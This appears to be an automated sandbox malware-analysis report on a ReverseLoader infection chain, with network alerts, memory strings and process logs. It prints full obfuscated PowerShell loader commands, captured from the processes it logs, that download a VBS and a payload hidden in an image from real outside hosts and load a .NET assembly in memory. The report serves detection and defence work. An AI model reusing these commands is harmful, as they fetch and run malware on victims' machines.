logrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotnet.mdirawrowjhdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dot
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2155555461.000000000798A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2152902022.00000000072D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbX source: powershell.exe, 00000007.00000002.2154082087.0000000007942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbDi source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb9e source: powershell.exe, 00000007.00000002.2154082087.0000000007942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2155555461.000000000798A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2152902022.00000000072D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2155555461.000000000798A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbifd source: powershell.exe, 00000007.00000002.2120286535.000000000319B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\dll\System.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 03438A66h	7_2_03438A30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 03438A66h	7_2_03438A21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 0343A895h	7_2_0343A819
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 0343A895h	7_2_0343A828

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 57.129.55.225:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.4:49731

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic	HTTP traffic detected: GET /dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/muVvq/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 151.101.1.137 151.101.1.137
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67

Source: Joe Sandbox View

ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49738 -> 104.21.84.67:443

Source: global traffic

HTTP traffic detected: GET /225/economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 57.129.55.225Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknown	TCP traffic detected without corresponding DNS query: 57.129.55.225

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_009D7A18 URLDownloadToFileW,

3_2_009D7A18

Source: global traffic	HTTP traffic detected: GET /dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/muVvq/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /225/economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 57.129.55.225Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 20 Dec 2024 15:35:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yfi3Tv6rtjN5mf5d%2BfkqHAM7hpotiFERKdd0TXUcwvZxpFK%2B1Gd%2FI%2FP0f8HwGEexb8DEzJAWdNnMxzOMlO%2BrfwwfudCVxzs0ynRLCELO2Eow8gKdoaHuLJ%2Bz%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f50b3b9987f428f-EWRalt-svc: h3=":443"; ma=86400

Source: powershell.exe, 00000003.00000002.1833759445.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://57.129.55.225/
Source: powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://57.129.55.225/225/economi
Source: powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://57.129.55.225/225/economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven.t
Source: powershell.exe, 00000003.00000002.1835596008.0000000007D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://57.129.55.225/Automation.resources
Source: powershell.exe, 00000003.00000002.1833759445.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://57.129.55.225/s
Source: powershell.exe, 00000003.00000002.1835596008.0000000007D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsofta
Source: powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.1832151277.0000000005767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1829980353.0000000004701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000005201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1829980353.0000000004701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000005201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBfq
Source: powershell.exe, 00000003.00000002.1829980353.0000000004858000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff.3.dr	String found in binary or memory: https://github.com/koswald/VBScript
Source: wscript.exe, 00000006.00000003.1821394695.0000000004E38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821494173.000000000046F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1822067432.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, economicthingsaregoingaroundwithhusbandwithgoodne.vbs.3.dr, economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff.3.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
Source: wscript.exe, 00000006.00000003.1818749086.0000000002A87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsy
Source: wscript.exe, 00000006.00000003.1818240602.0000000004981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821597208.0000000004A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821394695.0000000004E38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1821494173.000000000046F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1822067432.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, economicthingsaregoingaroundwithhusbandwithgoodne.vbs.3.dr, economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff.3.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
Source: powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1832151277.0000000005767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122511681.0000000006267000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000007.00000002.2120286535.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
Source: powershell.exe, 00000007.00000002.2122511681.0000000005357000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpgt
Source: powershell.exe, 00000007.00000002.2122511681.0000000005463000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49738 version: TLS 1.2

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim cmd 'string: ShellExecute arg #1	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim args 'string: ShellExecute arg #2	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim pwd 'string: ShellExecute arg #3	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim privileges 'string: ShellExecute arg #4	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: .ShellExecute cmd, args, pwd, privileges	Jump to dropped file
